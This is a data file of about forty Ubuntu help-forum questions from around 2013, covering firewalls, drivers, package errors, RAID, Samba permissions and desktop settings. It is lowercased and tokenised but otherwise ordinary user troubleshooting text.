275998	can i uninstall ufw completely ?	i need to configure iptables manually and save and restore the rules using iptables-persistent package . so i do n't want ufw anymore . i can simply disable it . but many chains are exists in iptables rules dump , and i do not want to see them . : input accept [ 593:73026 ] : forward accept [ 0:0 ] : output accept [ 449:94341 ] : ufw-after-forward - [ 0:0 ] : ufw-after-input - [ 0:0 ] : ufw-after-logging-forward - [ 0:0 ] : ufw-after-logging-input - [ 0:0 ] : ufw-after-logging-output - [ 0:0 ] : ufw-after-output - [ 0:0 ] : ufw-before-forward - [ 0:0 ] : ufw-before-input - [ 0:0 ] : ufw-before-logging-forward - [ 0:0 ] : ufw-before-logging-input - [ 0:0 ] : ufw-before-logging-output - [ 0:0 ] : ufw-before-output - [ 0:0 ] : ufw-reject-forward - [ 0:0 ] : ufw-reject-input - [ 0:0 ] : ufw-reject-output - [ 0:0 ] : ufw-track-input - [ 0:0 ] : ufw-track-output - [ 0:0 ] -a input -j ufw-before-logging-input -a input -j ufw-before-input -a input -j ufw-after-input -a input -j ufw-after-logging-input -a input -j ufw-reject-input -a input -j ufw-track-input -a forward -j ufw-before-logging-forward -a forward -j ufw-before-forward -a forward -j ufw-after-forward -a forward -j ufw-after-logging-forward -a forward -j ufw-reject-forward -a output -j ufw-before-logging-output -a output -j ufw-before-output -a output -j ufw-after-output -a output -j ufw-after-logging-output -a output -j ufw-reject-output -a output -j ufw-track-output commit # completed on sat mar 30 07:26:41 2013 but i just need to know , can i completely uninstall ufw or not ?
276008	how do i install skype on ubuntu 12.10 on a netbook with an atom cpu	how do i install skype on ubuntu 12.10 on a netbook with an atom cpu from the skype.com i tried to download skype for linux version 4.1 skype.com gives you the ability to choose the distribution to match your system the choices they give are : ubuntu 10.04 32 bit ubuntu 12.04 ( multiarch ) debian 7.0 ( multiarch ) fedora 16 32bit opensuse 12.1 32bit dynamic i have tried the ubuntu 10.04 , ubuntu 12.04 , and debian 7.0 but in every case the ubuntu 12.10 software center refuses to install skype with the error message '' wrong architecture 'i-386 ' which is not all that surprising since this is an atom based netbook . please advise me exactly what i should do to get skype up and running on my 12.10 atom netbook .
276012	bold font in user interface of libreoffice	i just had a new installation of libreoffice from apt-get and it seems that all the fonts in the user interface ( text in menus , text in dialogs etc ... ) appears to be bold . it creates an uncomfortable feeling ( at least to me ) , therefore i want to ask is there any way to make the font to become normal ( not bold ) ? also , as you can see , the checkbox of `` use system font.. '' is checked , but the fonts actually look weird to me . other applications , e.g . firefox , gedit ... do not have fonts look like that . is there a problem somewhere else in options ? my system is ubuntu 10.04 . i just recently removed ooo to install lo . also , here is the screenshot of my fonts settings : so what 's the problem with my setup ?
276014	how to install ubuntu 12.04 server with raid1 ?	i have spent the last 4 days or so trying to setup ubuntu server 12.04.2 with raid1 . i have looked at several different links and tried different configurations and workarounds . so far , i have not come out with a successful installation that passes the final test -- pulling out one drive , booting and checking the contents of my home folder , and doing the same for the other drive . so far , the closest i have come to succeeding is by setting up partitions this way : /dev/sda1 : allocated for raid /dev/sda2 : swap area /dev/sdb1 : allocated for raid /dev/sdb2 : swap area ( or left unassigned -- which somehow gets allocated as a swap area later on anyway ) /dev/md0 : ( paired sda1 and sdb1 ) raid1 device , ext4 filesystem , mount point / this installs successfully , i boot the system , then create a file called `` test '' on my home folder . i then shut down , disconnect drive b , power up , and check my home folder . `` test '' is there ... so far so good . then i create a second file , `` test2 . '' i shut down , reconnect drive b , power up , and check the folder . both files are there . i shut down , disconnect drive a , power up and check the folder . both files are absent from drive b . if anyone has any ideas on how i can successfully set this up and get my raid1 working , i will be very grateful and happy . oh yes ... i 've tried setups with 3 partitions instead of 2 , with efi boot and/or biosgrub , with no success ( either it would not boot , or i encounter the same situation with the test results above ) thanks .
276015	ubuntu 12.10 , i installed seahorse utils for encryption , but now 'passwords and keys ' wo n't open	ubuntu 12.10 , i can open 'passwords and keys ' app , but then when i install the seahorse plugins , i can no longer open 'passwords and keys ' -- when i click on the menu item/icon , nothing happens . then if i uninstall seahorse utils , i can open 'passwords and keys ' again . ugh . any help appreciated .
276018	broadcom bcm5787m stopped working as of the update i did today	i 've been on this for like the last six hours , trying to figure out how to turn my wifi back on . i updated today , now the wifi light is always orange ( off ) . i 've been trying to install the bcmwl kernel all night . when i type in lspci it shows : 84:00.0 ethernet controller : broadcom corporation netlink bcm5787m gigabit ethernet pci express ( rev 02 ) which i 'm assuming is the wireless adapter . so what 's the deal ? i 'm getting so frustrated by linux that i 'm ready to go back to windows . it worked this afternoon . it worked up until i downloaded whatever this latest update is . if i knew how to tell you what the update was , i 'd paste it here .
276025	turned on the automatic login & now the password does n't works . also having problem with keyboard input	i am new to ubuntu . i own a samsung series 5 notebook . i installed ubuntu today only & i was checking the options in user accounts . i switched on the automatic login option and the password was disabled . now when i try to change anything on my ubuntu it asks for a password and when i enter my old password it says that authentication failed . i did n't change the password , i had just disabled it . what is my new password then ? i am facing another problem . i installed steam software from ubuntu software centre and when i run it from desktop it asks for a password but i ca n't enter anything there . my keyboard stops working at that point . to fix problem 1 i tried this method . i booted my ubuntu in recovery mode and selected root option . then i typed 'mount -rw -o remount / ' and then 'passwd myusername ' and then it asks me to enter new password but my keyboard stops working at this point . keyboard stops working only when i enter password . it does n't takes any input at all . only the 'enter ' key works . keyboard works fine when password option goes . pls help .
276029	package error making it unable to install anything in 12.10	the other day i was trying out different desktop environments , like pantheon , gnome , etc . but when i was trying to install pantheon/elementary shell , it came up with an error , i ignored it thinking it was nothing important ( because it was just about the themes ) . and a few days before that , i was testing out different themes with the window manager and icons , one of the themes happened to be the elementary icon pack . now whenever i try to install something it tells me to type in `` sudo apt-get -f install '' , and when i type it in , i get some errors . here is the output of my terminal : @ -pc : ~ $ sudo apt-get install cinnamon reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : cinnamon : depends : gir1.2-muffin-3.0 but it is not going to be installed depends : libmuffin0 ( > = 1.1.2 ) but it is not going to be installed depends : caribou but it is not going to be installed depends : mesa-utils but it is not going to be installed depends : gkbd-capplet but it is not going to be installed recommends : nemo but it is not going to be installed elementary-artwork : depends : elementary-theme but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . @ -pc : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : elementary-theme the following new packages will be installed : elementary-theme 0 upgraded , 1 newly installed , 0 to remove and 41 not upgraded . 2 not fully installed or removed . need to get 0 b/57.4 kb of archives . after this operation , 415 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 279974 files and directories currently installed . ) unpacking elementary-theme ( from ... /elementary-theme_3.2-0~r601+pkg289~quantal1_all.deb ) ... dpkg : error processing /var/cache/apt/archives/elementary-theme_3.2-0~r601+pkg289~quantal1_all.deb ( -- unpack ) : trying to overwrite '/usr/share/themes/elementary/gtk-3.0/toolbar.css ' , which is also in package elementary 3.1 errors were encountered while processing : /var/cache/apt/archives/elementary-theme_3.2-0~r601+pkg289~quantal1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) '' please help , i ca n't do anything that i wanted to do now . p.s . in the notifications place ( in unity the top bar , gnome the notification centre at the bottom of the screen ) it has an error saying : an error occurred . please run package manager from the right-click menu or run apt-get in a terminal to see what is wrong . the error message was : error : brokencount > 0 '' . this usually means that your installed packages must have unmet dependencies . `` * thank you in advanced for helping me .
276037	ubuntu one uninstall / re-install broken windows xp sp3	ubuntu one is broken and will no longer sync on my windows xp sp3 laptop . it says `` getting information , please wait ... '' forever , on home network with no firewall or proxy . once it is stuck , it will no longer shut down or close the systray red u object short of an `` end process '' from task manager . yes , there 's an exception for it in the windows firewall . i do not know how to successfully uninstall/re-install ubuntu one to fix it . every time i uninstall it and / or delete the program files directory and / or registry entries for it , and move the ubuntu one directory , it never asks me for my credentials again when i re-install the latest versionubuntuone-4.1.91.1-windows-installer.exe how do i completely uninstall it ? i have had so many broken versions of this software i have simply run out of patience and am now trying out spider oak to replace it . where can i find an old version that works , if i am not able to get this one working ? i am asking two specific questions here . how to do a successful uninstall / re-install of ubuntu one from windows xp sp3 , so that i am asked for my log in credentials once again just like a fresh install on a new os ? where can i find old versions of ubuntu one to download and try out to find a version that works ? thank you
276038	how do i uninstall codeblock ?	i installed codeblocks 12.11 on ubuntu 12.10 manually from terminal using sudo dpkg -i *.deb and then uninstalled it from software center . the icon is still shown in the main lens but does n't work any longer . how can i remove the app completely from system ? ?
276039	how can i find the memory usage on my gpu ?	previously i was checking the memory usage on my gpu with the following command : nvidia-settings -q all | grep memory i am processing some scientific data on my gpu with numpy and theano . i was doing this with the gnome desktop running , and there was already 380 mb of memory used on the device . so i stopped lightdm to free up a little more gpu memory ; but , now the nvidia-settings tool no longer works . it simply errors that there is no display error : can not open display ':0.0 ' . is there some other way of getting gpu memory without using this tool ? is there some way to use make it function in headless mode ?
276043	how to increase audio levels on xfce ?	i have ubuntu installed and installed xfce as the interface which i run because it 's faster . since i am using a laptop , my speakers are sometimes much lower than what i like them to be which is why i use ubuntu audio settings of past 100 % , adjust it to 150 % then adjust it in the desired program . however sometime 's this is troublesome for xfce because it might reset itself , then i will have to log out and boot into unity set it to 150 % to get it working . is there anyway of opening this up in xfce or in the terminal so i can increase to 150 % and is it possible to go beyond that ? the 100 % option in xfce is not adequate and is much lower than in windows 7 .
276044	setting permissions for home server directories	i am fairly new at all this . i have set up a home server using an old laptop and ubuntu 12.04 to stream media to my lg tv through their dlna system called medialink . this is being done through plex media server . i am also using a windows vista pc to access the file system on the server to backup data and copy media onto the server for use in plex . i am running samba which i have set up through the gui interface . i am sharing two directories on the network and have mapped these on the vista pc . for each of these directories , i have allowed access to everyone through samba . in samba i have set up the server security settings as 'authentification mode - user ' , 'encrypt passwords - yes ' and no guest account . for each of the directories i have applied read / write permissions to the owner , group and others through nuatilus by right clicking on the drectories and setting permissions through the properties . the problem i am having is that anything i add to the directories or change in the directories using my vista pc does n't have the same permissions as the directory . in fact , i can then not access these files through the server ( using vnc ) and plex can not play these files as they are locked and only accessible be the vista pc . it seems i can use nuatilus to apply the correct permissions after the fact , but i want this to happen automatically . i have read a number of articles detailing fixes through the terminal and through the smb.conf file by setting the user profiles to 777 , 076 , etc but do n't really know what i 'm doing with this and do n't want to break things . any help would be much appreciated . step-by-step instructions please .
276048	how do i get an ralink 3290 wireless card to work ?	i have followed the instructions here : wireless ralink rt3290 not working on asus and a few other places : http : //droid-hive.com/index.php ? /topic/1272-how-to-install-ralink-rt3290-wireless-drivers-on-ubuntu-1204/ as of now , my system sees the wireless device but is unable to enable it . it appears to be locked in the off position in the network manager and i am unable to connect to anything . here is my lspci : 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation panther point pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 network controller : ralink corp. device 3290 01:00.1 bluetooth : ralink corp. device 3298 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5229 ( rev 01 ) when i run ifconfig , i see this : eth0 link encap : ethernet hwaddr 38 : ea : a7 : f0 : ac:9d inet addr:192.168.1.145 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : 2002:4ac1:25d6:0:3aea : a7ff : fef0 : ac9d/64 scope : global inet6 addr : fe80 : :3aea : a7ff : fef0 : ac9d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:29345 errors:0 dropped:0 overruns:0 frame:0 tx packets:17847 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:40090222 ( 40.0 mb ) tx bytes:1727944 ( 1.7 mb ) interrupt:42 base address:0x4000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:722 errors:0 dropped:0 overruns:0 frame:0 tx packets:722 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:66926 ( 66.9 kb ) tx bytes:66926 ( 66.9 kb ) iwconfig yields this : lo no wireless extensions . ra0 ralink sta eth0 no wireless extensions . i am running an hp pavilion g6 with an i5 cpu and uefi bios ( it came preloaded with windows 8 , sadly ) . i really need help getting this wireless card up and running as my company intends to use this machine as a platform for development personnel . thanks in advance for the help ! it is greatly appreciated
276049	my wireless adapter is `` hard blocked '' - wn2001 on an asrock amd e350m1/usb3	my wireless adapter is hard-blocked and i do not know how to fix it . i have tried the following : sudo rfkill unblock all sudo rmmod rtl8192cu & & sudo modprobe rtl8192cu sudo rm /dev/rfkill sudo iwconfig wlan0 txpower auto sudo ifconfig wlan0 up my wireless adapted is the prolink wn2001 , my motherboard is a asrock amd e350m1/usb3 . here 's information from rfkill list all : 1 : phy1 : wireless lan soft blocked : no hard blocked : yes here 's information from lshw -c network : *-network disabled description : wireless interface physical id : 1 bus info : usb @ 1:3 logical name : wlan0 serial : 72:70:17:03:4d:61 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rtl8192cu driverversion=3.5.0-22-generic firmware=n/a link=no multicast=yes wireless=ieee 802.11bgn if it helps , back when i was on windows i disabled the device via the driver application provided by prolink . i do n't really want to have to reinstall windows just to enabled the wireless adapter again , so im hoping there is a solution .
276050	have set up a file server . how to make it accessible from anywhere ?	i have installed xubuntu and made it a file server in my college using this guide . how to build your own file server okay i am pretty new to these things , but i want to know a few things ? 1 ) i understand the machine is in my college and have a local static ip assigned to it . so how can i access that machine from anywhere else outside ? ( port forwarding ? but how to do that ? ) 2 ) installed proftpd on it , but have no idea on how to use it ? 3 ) how can i access that machine remotely ? right now i am only getting shell access using putty . 4 ) how can i make the most out of it ? have a dedicated 54 mbps line for this machine .
276056	my desktop is gone	my unity desktop is gone after running these commands sudo apt-get purge fglrx* sudo add-apt-repository ppa : andrikos sudo apt-get update sudo apt-get install fglrx xserver-xorg-video-intel not sure how to get it back . i 'm running chrome through the terminal /opt/google/chrome/google-chrome looking at ccsm , the unity plugin seems enabled . i really do n't know what to do : ( currently , my desktop looks like this https : //www.dropbox.com/s/xznxinitg2yrhtp/screenshot % 20from % 202013-03-30 % 2018 % 3a17 % 3a57.png @ nerof61 - i have tried his suggestion by running the command sudo unity -- replace sudo unity -- reset and the results are still the same . here are some of the messages that shows in my terminal after running these two commands . nfo : loading plugin : core compiz ( core ) - info : starting plugin : core unity-panel-service : no process found compiz ( core ) - info : loading plugin : reset compiz ( core ) - error : failed to load plugin : reset compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : default compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite ( process:6575 ) : glib-warning ** : in call to g_spawn_sync ( ) , exit status of a child process was requested but sigchld action was set to sig_ign and echild was received by waitpid ( ) , so exit status ca n't be returned . this is a bug in the program calling g_spawn_sync ( ) ; either do n't request the exit status , or do n't set the sigchld action . ** ( process:6575 ) : warning ** : failed to commit changes to dconf : error spawning command line `dbus-launch -- autolaunch=fbaaf03a47625e9ba0cde97e0000000a -- binary-syntax -- close-stderr ' : child process killed by signal 59 @ nerof61 - unfortunately , i have a slow connection today and ca n't afford to download gnone or others.. is there any other way for this ? @ htet kyaw lwin - as per your suggestion , i 've tried to remove the driver i 've installed using this commands sudo sh /usr/share/ati/fglrx-uninstall.sh sudo apt-get remove -- purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* actually , only the second run . then i rebooted my system and it 's still the same . still the top navigation and side navigation is missing . i appreciate all the help . [ solved ] @ htet kyaw lwin - i 've tried to go back to your suggestion , but this time , i specified only 1 item to be purged sudo apt-get remove -- purge fglrx then tried to reboot and now it 's back ! thank you for all the help : )
276060	ubuntu 12.10 gnome commander change connection	i have just installed ubuntu 12.10 and gnome commander 1.2.8.15 . in the commander i can not use alt+f1 or alt+f2 to change left/right connection . when i press either key combinations , the menu pane gets activated , but nothing happens . i have installed ccsm , where i have modified key bindings at gnome compatibility and also at unity . do you have any ideas , what i am missing ? thanks .
276061	crossover connection between two ubuntu pcs using samba very slow	i got a cat5e crossover cable to exchange files between my pc and notebook real quick but the transfer rate is 1.3 mbs . using usb 2.0 i 'm soo much faster putting files on my external hdd . this ca n't be right , can it ? both pcs run 12.04 64bit .
276062	regarding installation	madhusudan @ ubuntu : ~ $ apt-get update e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? madhusudan @ ubuntu : ~ $ what should i do to solve this problem ?
276063	can not boot into ubuntu after crash	after my machine froze , i decided to force shutdown and now i can not boot into ubuntu . the boot process passes the ubuntu 12.10 load screen , it actually shows it for a second then moves to a black screen and hangs there showing the following text . ( with `` [ ok ] '' at the end of each line ) *starting virtualbox kernel modules aned disabled ; edit /etc/default/saned *stopping anac ( h ) ronistic cron * checking battery state ... *starting cpus printing spooler/server * stopping system v level compatibility *starting that 's it . and it hangs on that screen . i ca n't use my machine at all . i am not running dual boot or a virtual machine . the last thing that happened was , i updated , then i was watching a video on youtube . when i click on the main launcher on the taskbar , top left , which only showed that icon and the firefox icon , my machine froze ( i could n't do anything and the video was still playing , did n't see my cursor , no movement at all . ) what can i do ? luckily i have a droid to post from which takes two and a half million years for a small post ! edit : i have 12.10 on a usb stick - if that helps .
276065	how to create a shared repository in dumb server mode in bazaar ?	how can i create a shared repository on a server if i only have access using sftp : // ? i suppose i could create the shared repository locally and then i could copy it to the server . in any case , can bazaar use a remote shared repository in dumb server mode ? let 's say i do this : bzr init-repo /tmp/repo rsync -a /tmp/repo server : /tmp/ cd /path/to/a/branch bzr push sftp : //server/tmp/repo/branch1 bzr push sftp : //server/tmp/repo/branch2 will the first push store its revisions in the shared repo , so that the second push will run very fast , since it does n't need to store any new revisions ?
276067	custom keyboard shortcuts	i do n't understand why my custom hotkeys arenât working . the commands work fine on the terminal and my choice of hotkeys do work for other commands ( i tried gedit ) . this is what i did , only the first one works : the full command is echo -n `` pause '' | nc -u /home/me/.local/share/vlc/vlc.sock it works on the terminal
276072	how to install qt4 in ubuntu 12.10	i tried to use qt5 but i have some problems while making debian packaging process with qt5 so i would like to have qt4 on ubuntu 12.10 . how can i install qt4 .
276073	xfce-mixer does not work as expected	i am using ubuntu 12.04 and i chagne to xfce 4.6 . then i found that i can get no voice when i play a mp3 using the audacious or watch some video in youtube . and i found the xfce-mixer which is used to control the voice in xfce . after some setting i can listen the song but with a very noise background-voice . normally , a song will conatain the singer 's voice and the background music . now the background-music is higher than the singer 's voice . this is my setting of mixer : as you can see , there are two scroll bars . after some test , i found that the left control the singer 's voice , and the right control the background-music . however when i scroll over the `mixer track in the lower-right of my desktop using the mouse scroller , the singer 's voice will get synchronized with the background-music : do i miss anything ?
276074	virtualbox client os ( using nat ) is able to access host 's lan - how come ?	my network is somewhat simple : all pcs in my lan ( ubuntu desktop , win7 desktop , xp netbook ) connected to a dlink home router , which is connected to isp 's cable modem . lan has ip subnet 10.10.10.0/24 , gateway ( the dlink router ) is 10.10.10.1 , the pcs are 10.10.10.100-120 , via dhcp . the pcs share folders among themselves ( basic right-click - > share , this is samba , right ? ) . so far , so good . now the ubuntu desktop has virtualbox . i was planning on installing sandboxed vms to test malware ( and monitor the way they `` call home '' ) . so i installed an ubuntu vm , network set to nat mode ( the default mode , subnet 10.0.2.0/24 i guess ) . so i open up nautilus in the vm , go to `` network '' , and to my surprise ... the vm is able to see all the shared folder in the host 's lan ! ! ! how ? is n't `` shared folders '' something that works on the lan only ? how come a vm that lives in another subnet can access , say , a shared folder in the win7 machine ? they are not in the same lan ! ( that would be virtualbox 's `` bridged '' mode , correct ? ) . and no , i do not mean virtualbox 's `` share folder '' feature ( that maps a host drive as a network share to the guest ) , i 'm not using it . so , i clearly lack some fundamental knowledge of how shared folders and nat works.i assumed nat would isolate the vm from my lan while still being able to browse the internet . i am very surprised it was able to see my lan 's workgroups even being in a different subnet . so , question is : how is that possible ? how this relation between virtualbox , shared folders and nat works ? and how to setup the vm so it ca n't see the guest 's lan but is still able to browse the internet ?
276080	files disappearing from internal ntfs hard drive	i am using ubuntu 12.04 with the xubuntu desktop package installed and am having problems with an internal ntfs hard drive . entire directories seem to be emptied without warning or going to the waste basket . this has been happening for at least a couple of months ; i first noticed a problem when music files were n't being read into the library by rhythmbox but assumed it was a rhythmbox problem . i 've now noticed that a directory with nearly 500gb of files/sub-directories has been emptied . the strange thing , however , is that the drive is n't showing an increase in the amount of free space it has - as though the files are still there . when doing an ls of the specific folder that seems to be emptied , i receive an input/output error , but can ls the root of the drive fine . i do n't have windows installed on this machine either , and most of the other related questions seem to be related to dual booting windows . any ideas on the cause of the problem and how to fix it ?
276090	how to wildcard tesseract ?	i want tesseract to convert all the files of a folder . i do not want to merge the files in any way as i am having trouble with programs like hocr2pdf and pdfbeads merging more than one file at a time . i run tesseract *.tif * hocr and end up with the following read_params_file : parameter not found : ii*
276098	which of the major desktop environments are known to `` hurt '' each other , if installed simultaneously ?	i have a friend who is new to ubuntu , and he wants to find the right desktop environment . i 'd like to be able to recommend that he simply install several of the major de 's simultaneously , then try them out one at a time , selecting between them from the login screen . but i 'm reluctant to recommend this . in the past , i 've been bitten by installing more than one de at a time . here 's a past example : https : //bugs.launchpad.net/unity/+bug/751374 does anyone know of any current nasty bugs where any of these de 's will `` step on each other 's toes '' ? can i just trust that it 's safe to install all of the following simultaneously ? unity gnome 3 xfce lxde cinnamon mate kde
276099	skip a real time update	i ran the following command to upgrade : sudo apt-get install upgrade . for some reason , the upgrade of the package google-chrome-stable is not going as expected - it downloads the 40mb package but it freezes mid way and starts all over again from 0kb ( for google-chrome-stable only ) . i assume that it has finished downloading other packages but it can not proceed to install them since download of a package is still pending . how do i skip this package so that it can proceed with the installation and upgrade of other packages which have been downloaded completely . keep in mind that the upgrade is currently running so removing the repository from ubuntu software center will be for future upgrades - i need a solution for an upgrade happening right now .
276101	gzip and rename ( remove .gz extension ) all files except images and pdfs ?	i am able to gzip every file in a directory ( mydirectory ) using the command : gzip -- suffix .gz -- recursive mydirectory but ... i do n't want the images ( .ico , .jpg , .png , .gif ) and pdfs ( .pdf ) files within the directory to be gzipped . and those files that are gzipped have the .gz extension . i do n't want that . for example , i 'd like the gzipped index.html file be index.html itself , and not index.html.gz . so , how do i do this , optimally/efficiently ? here 's how i am doing this now ( a pretty lengthy process ) . compress all files in mydirectory but do n't delete/replace original files : cd ~/mydirectory find . -type f | \ while read -r x do gzip -c -9 `` $ x '' > `` $ x.gz '' done remove all gzipped image and pdf files : find . -type f -iname `` *.ico.gz '' -exec rm -f { } \ ; find . -type f -iname `` *.jpg.gz '' -exec rm -f { } \ ; find . -type f -iname `` *.png.gz '' -exec rm -f { } \ ; find . -type f -iname `` *.gif.gz '' -exec rm -f { } \ ; find . -type f -iname `` *.pdf.gz '' -exec rm -f { } \ ; rename the existing gzipped files , essentially removing the .gz extension from their name : cd for f in `find mydirectory -iname '*.gz'` ; do mv $ f $ { f % .gz } done what we pretty much have now are gzipped text files ( .html , .xml , .css , .js ) without .gz extension , and uncompressed/un-gzipped images and pdfs .
276112	how to fix `` some packages could not be installed ... unmet dependencies '' installing java ?	i have some problems downloading with the sudo apt-get command . i try to get java runtime : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : openjdk-6-jre : depends : openjdk-6-jre-headless ( > = 6b27-1.12.3-0ubuntu1~12.10.1 ) but it is not going to be installed depends : libgif4 ( > = 4.1.4 ) but it is not installable depends : libatk-wrapper-java-jni ( > = 0.30.4-0ubuntu2 ) but it is not installable recommends : ttf-dejavu-extra but it is not installable recommends : icedtea-netx but it is not installable can someone help me , i 'm new to linux/ubuntu ?
276123	can not upgrade linux kernel to newest version	my current kernel version shown by uname -r is : 3.5.0-17-generic . however , there are files related to newer version kernel 3.5.0-26 in /boot . so i want to upgrade the kernel to 3.5.0-26 by running : sudo apt-get install linux-image-3.5.0-26-generic . but it shows : linux-image-3.5.0-26-generic is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i tried sudo apt-get purge linux-image-3.5.0-26-generic , then re-install it by sudo apt-get install linux-image-3.5.0-26-generic . this time , i can install the newer kernel , but uname -r stil shows 3.5.0-17 . i did n't try the other way around , that is , removing kernel 3.5.0-17-generic , since it is the currently used one , i am afraid removing it might cause problems . so i am confused . if linux-image-3.5.0-26-generic is already the newest version , why uname -r shows 3.5.0-17 that is an older version ? ps : before this , i have no space problem in /boot , and i can not update any packages . as i said , my current kernel version is 3.5.0-17 . but there are many files related to newer version kernels , ranging from version 3.5.0-18 to 3.5.0-26 . so i found a script to remove all of them , but files related to 3.5.0-26 are still there .
276124	are symlinks internally bidirectional or are they only pointing somewhere ?	how are symlinks implemented ? are references stored on both sides or only in the location where the symlink is pointing from ? story : i have a weird `` bug '' in the folder view of sublime . a folder that contains files is shown as empty , but there are files in there not starting with a dot . but there is a symlink from another location to this folder . that is the only thing i can think of right now that could be the reason why it shows as empty ? update : seems it might be related somehow to this ( and therefore , related to inodes ) : http : //www.sublimetext.com/forum/viewtopic.php ? f=3 & t=7142 & start=10 . i tried the config setting that is mentioned there in the last post , but it did not have any effect . that is : preferences > settings -- user : '' ignore_inodes '' : true
276129	how do i install plesk from downloaded file in ubuntu	its simple really , i would like to be able to run the auto installer i have downloaded from here : http : //www.parallels.com/download/plesk/10/ i downloaded parallels_installer_v3.12.0_build120601.16_os_ubuntu_10.04_i386 for my ubuntu 10.4 32-bit . i have added to folder path /plesk/parallels_installer_v3.12.0_build120601.16_os_ubuntu_10.04_i386 but when i run : `/plesk/parallels_installer_v3.12.0_build120601.16_os_ubuntu_10.04_i386 ' in the terminal nothing happens ? clearly i have no idea how this should be installed ... but this was my best guess .
276136	no shell prompt in gnome terminal	i was a bit behind and spent yesterday and a lot of bandwidth with three upgrades from 10.10 to 12.04 . most things seem to work but when , i launch the terminal , a get a new window but there is n't a shell prompt . i created a new user and that user sees a prompt . the only difference in the .bashrc files is in histcontrol -- no differences in the prompt . in my original user account , the xterm and uxterm apps work perfectly . byobu terminal fails just like the gnome-terminal except there is some kind of status line at the bottom . obviously some configuration was messed up in the upgrades . i 'm new to unity and i 'm being guied to death . i would appreciate some help on where to look . thanks
276137	mapping capslock to ctrl in ubuntu 12.10	i have found different options for mapping capslock to ctrl key in the keyboard settings . the most convenient for me is to have capslock work as ctrl when pressed with other keys , but to work as capslock when pressed by itself . in fact , that 's what i thought it meant to keep capslock keysym . at this point , i do n't know if this is a bug , or most likely , a confussion that i have of what a keysym is . if it 's a bug , how do i fix this ? if not , what does it mean for it to keep the capslock keysym ? and is it possible to have capslock work as ctrl with other keys , but as capslock itself when pressed alone . thank you for your help .
276138	early install - 13.04 vs 12.10	this past week i built a new system that i need to install ubuntu on . i would like to use 13.04 once it is released , and was hoping to wait until then for the system build . unfortunately the system this one is replacing died this past week , necessitating moving up the schedule . my question is whether it is better to install 12.10 for now and upgrade once 13.04 is fully released or install a pre-release version of 13.04 and just apply the updates once the full release comes out ? if you have specific reasons for recommending one option versus the other , i would love to hear those , too .
276139	ubuntu keyring resets automatically when i logout	as written in the title , when i logout , and login my keyring password is getting reset to my user password after the next reboot . i tried everything to fix this problem since i installed ubuntu 12.10 does anyone know how i can fix this problem , because it makes me crazy .
276145	12.10 system settings removed	i just tried to find a solution for dual monitorsetup , installing gconf-editor and `` additional drivers '' on my ubuntu 12.10 cairo-dock desktop laptop . actually i deinstalled my bluetooth programms before this , because there was no connection to my nokia phone . the result is , that i cant even change my desktop background image . in the softwarecenter now i installed `` system settings ( systemsettings ) '' but it shows me only the kde system settings application . what now ? i cant use the second monitor . thank you for helping !
